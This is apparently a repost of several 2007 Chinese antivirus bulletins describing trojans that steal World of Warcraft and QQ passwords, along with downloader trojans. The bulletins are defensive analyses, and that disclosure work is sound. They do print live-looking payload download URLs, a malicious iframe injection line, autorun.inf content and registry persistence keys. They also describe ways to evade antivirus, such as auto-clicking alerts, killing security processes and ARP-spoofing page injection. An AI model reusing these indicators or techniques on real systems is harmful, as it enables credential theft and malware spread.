天高云淡

危险等级：★★★病毒名称：Trojan.PSW.Win32.WoWar.acl截获时间：2007-10-18入库版本：19.45.40类型：病毒
感染的操作系统：Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况：
传播级别：低
全球化传播态势：低
破坏力：低
清除难度：困难
破坏手段：窃取《魔兽世界》网络游戏用户的隐私（帐号、密码等）
此程序为窃取游戏帐号和密码的木马程序。
程序运行后从会释放addrmshelp.dll、addrmshelp.cfg和qdshm.dll至%windir%\system32目录下，并设置文件的属性为隐藏和系统属性，这样用户用简单的显示隐藏文件不能发现此文件。
在进程中搜索进程名为Wow.exe的进程，并把它结束。让用户重新登陆游戏，以让自己马上获得一次窃取用户信息的机会。
安装SPI过滤模块，对应的文件是qdshm.dll，假如有程序加载Winsock2.dll也会导致qdshm.dll被加载。改动态库初始化，判定当前进程名，假如是Explorer.exe，则会尝试加载其他窃取游戏密码的工作动态库，这些动态库的名字可能是：addrdjhelp.dll，addrqqhxhelp.dll等。假如不是Explorer.exe，则查找Explorer.exe进程，尝试注入qdshm.dll。
释放的addrmshelp.dll为工作动态库。该动态库初始化时会判定当前进程名。假如是explorer.exe进程，则安装Windows消息钩子，目的是将此动态库注入到其他进程中。假如不是，则判定当前进程的目录下是否存在ollydbg.ini文件，假如存在该文件，提升当前进程权限，并尝试结束winlogon.exe，csrss.exe，smss.exe进程使系统崩溃。这样做是为了试图阻止用ollydbg调试该程序。假如是Wow.exe进程，则尝试通过读取进程一些特定的内存地址的数据来获取用户信息。窃取成功后，通过HTTP方式将用户名密码发送至木马散播者设置的URL，使用户遭受损失。
安全建议：
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件天天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。
3 不浏览不良网站，不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
[…]

[Read more →]

危险等级：★★★病毒名称：Trojan.PSW.Win32.QQPass.yvr截获时间：2007-10-25入库版本：19.46.31类型：病毒
感染的操作系统：Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况：
传播级别：低
全球化传播态势：低
破坏力：低
清除难度：中
破坏手段：窃取密码
该程序为VC编写的盗取用户QQ密码的木马程序,程序运行后执行如下操作：
1.尝试创建类名为sun的窗口接收窗口消息;
2.创建一名称为FirstName的互斥量,防止实例重复运行。若互斥量已经存在，则结束进程自身;
3.获取系统目录，并释放名下列文件到系统目录下： sysnewdll.exe sysnewgui.exe sysnewmsg.gif newautorun.inf
4.枚举进程，获取explorer.exe进程句柄;
5.在该进程中创建远程线程，加载sysnewdll.exe执行。
动态库sysnewdll.exe行为：
1.获取模块句柄,注册窗口类sun并创建该类名的窗口;在其窗口过程中执行如下操作：若消息为WM_CREATE，则设置时间间隔为100ms和1500ms的定时器。
2.若消息为WM_QUERYENDSESSION（结束会话），则拷贝自身到%SysDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup下命名为winstarter.exe。设置注册表项HKLM\SOFTWARE\Microsoft\windows\currentversion\run实现自启动
[…]

[Read more →]

危险等级：★★★病毒名称：Trojan.DL.Win32.AntiAV.a截获时间：2007-10-26入库版本：19.46.42类型：病毒
感染的操作系统： Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况：
传播级别：中
全球化传播态势：低
破坏力：低
清除难度：困难
破坏手段：下载恶意程序并执行，具有穿越杀毒软件主动防御和使各厂家软件病毒预警模块失效的功能。
这是一个这是一个Delphi编写的木马程序，主要功能为下载并运行可疑文件并运行,该病毒的危害级别较高。
1.病毒运行后会将调用CreateThread起两个线程，完成穿越杀毒软件主动防御和使各厂家软件病毒预警模块失效的功能。具体实现如下：
(1)线程1：以10毫秒为周期，调用FindWindow查找“WINDOW:主动防御 信息”的窗口，调用SendMessage发送WM_LBUTTONDOWN和WM_LBUTTONUP消息，模拟鼠标左键点击“答应”按键，来通过杀毒软件的主动防御。
(2)线程2：以5毫秒为周期，调用FindWindow查找”AVP.AlertDialog”，”AVP.Product_Notification”，”注册表警告”，”###McAlertWindow###”，”McAfee Personal Firewall Plus 警报”，”瑞星注册表监控提示”的”NotifyWnd”-报警的按键类窗口；调用SendMessage发送WM_CLOSE消息关闭这些病毒预警提示窗口，实现使各厂家软件病毒预警模块失效的功能。
2.病毒会将自身复制到%WINDIR%\inf目录下，分析当时存储的文件名为MsnSvc64.exe（病毒复制到系统的的文件名和病毒原始文件名相同），并将资源中的动态库以文件名为usbctrl02.inf释放到同目录下，将这两个文件的属性设置为系统和隐藏，设置消息钩子将该动态库加载到系统进程中，该动态库主要功能为辅助主文件实现自身的加载、注册表项的修改和下载可疑文件并运行等功能。
3.病毒会向注册表项SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options \ctfmon.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Explorer.exe
中加入Debugger子键其键值为“%WINDIR%\inf \MsnSvc64.exe”。（指定的文件名为复制到系统中的病毒文件名）被修改后，假如运行指定程序ctfmon.exe，系统会自动将病毒文件运行起来。
[…]

[Read more →]

危险等级：★★★病毒名称：Trojan.PSW.Win32.WoWar.adl截获时间：2007-10-28入库版本：19.46.61类型：病毒
感染的操作系统： Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况：
传播级别：低
全球化传播态势：低
破坏力：低
清除难度：低
破坏手段：窃取网络游戏《魔兽世界》用户密码
这是一个偷网络游戏《魔兽世界》用户密码的病毒。病毒运行后会进行以下操作： 1. 在System32路径下释放病毒本身wsmsaax.exe和动态库wsmsazx.dll，添加以下键值实现自启动：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows “AppInit_DLLs” = wsmsazx.dllHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks “{392FADFA-BCDE-ACDF-CDEF-21054865CBA3}” = wsmsazx.dll 2. 通过创建远程线程把动态库注入到Explorer.exe进程中。 3. 病毒运行完后会把自己删除。动态库被加载起来后首先会查找C:\Program Files\NetMeeting、D:\Program Files\NetMeeting、System32路径下是否存在类型为.cfg的文件，假如存在则把这些文件全部删除。查找动态库所在进程是否是WoWar.exe，假如是则创建两个线程进行6-7操作，不是则创建一个线程进行1-5的操作： 1 调用SetWindowsHookEx函数挂接鼠标键盘钩子。 2. 调用OpenProcessToken、LookupPrivilegeValue、AdjustTokenPrivileges函数提升自己权限。 3. […]

[Read more →]

危险等级：★★★病毒名称：Trojan.Win32.DL.AntiAV.a截获时间：2007-10-26入库版本：19.46.42类型：木马下载病毒
感染的操作系统： Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况：
传播级别：中
全球化传播态势：低
清除难度：困难
破坏手段：下载，传播
这是一个VB语言编写的病毒，用NSpack加壳程序进行保护。
1、自我复制和自启动。将自己复制到%windir%下，文件名为：vsdrv.exe。同时在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下增加值vistadrv= vsdrv.exe，实现开机自启动。
2、尝试下载以下文件并运行：http://zy3653.com/gz/1.txthttp://zy3653.com/gz/2.txthttp://www.wdsc888.cn/arp/rav.jpg
3、释放一个VBS脚本程序文件（s.vbe），该程序的功能为在本地文件中插入挂马网址。接着运行该脚本程序，试图向D，E，F分区中的index.asp，index.html，index.htm，default.asp，default.html等文件中插入“<iframe src=http://upx.kmip.net/muma/1.htm widht=0 height=0></iframe>”，完成本地挂马过程。
4、禁用部分安全软件相关的服务。通过net命令禁止Windows自带防火墙，金山毒霸、Norton等杀毒软件相关的系统服务。
5、结束部分安全软件进程。遍厉系统中的活动进程，进行进程名的比对，假如发现是病毒关心的杀毒软件进程，则强行结束。病毒关心的进程名有：ccenter.exe ，rav.exe，runiep.exe，ras.exe，Iparmor.exe，360safe.exe，360tray.exe，kmailmon.exe等。
6、调用病毒生成的csrss.exe（并非Ｗindows操作系统的csrss.exe，为一ＡＲＰ欺骗挂马工具）进行ARP欺骗挂马。病毒调用route命令获得本网的网关IP地址，接着对其进行ＡＲＰ欺骗挂马，可导致通过网关的HTTP回应包都会被插入挂马网址，危害较大。
安全建议：
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件天天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。
[…]

[Read more →]

危险等级：★★★病毒名称：Trojan.DL.Win32.Autorun.yws截获时间：2007-10-31入库版本：19.47.21类型：病毒
感染的操作系统： Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况：
传播级别：低
全球化传播态势：低
破坏力：低
清除难度：困难
破坏手段：下载运行恶意程序
此程序为Trojan类型程序
1、程序运行后将自身复制到%system32%目录下命名为Systom.exe，并添加注册表项实现开机自动运行，添加的注册表项如下：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Crsss=“%system32%\Systom.exe”
2、将自身复制到磁盘分区根目录命名为sos.exe，并写入与之对应的autorun.inf。autorun.inf文件的内容如下：[AuToRun]open=sos.exeshell\open=打开(&O)shell\open\Command=sos.exeshell\open\Default=1shell\explore=资源治理器(&X)shell\explore\Command=sos.exe 实现用户打开磁盘运行该病毒和传播的目的。
3、下载指定的文件并且运行。
要下载的文件有：http://www. rXXX.com/mm.txt，http://www. rXXX.com/ee.txt 等。这些文件为PSW类型的木马程序。
4、更改如下注册表项：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr= 00000001 HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\AdvancedHidden = 00000000 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHideFileExt = 00000001 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedShowSuperHidden =00000000
[…]

[Read more →]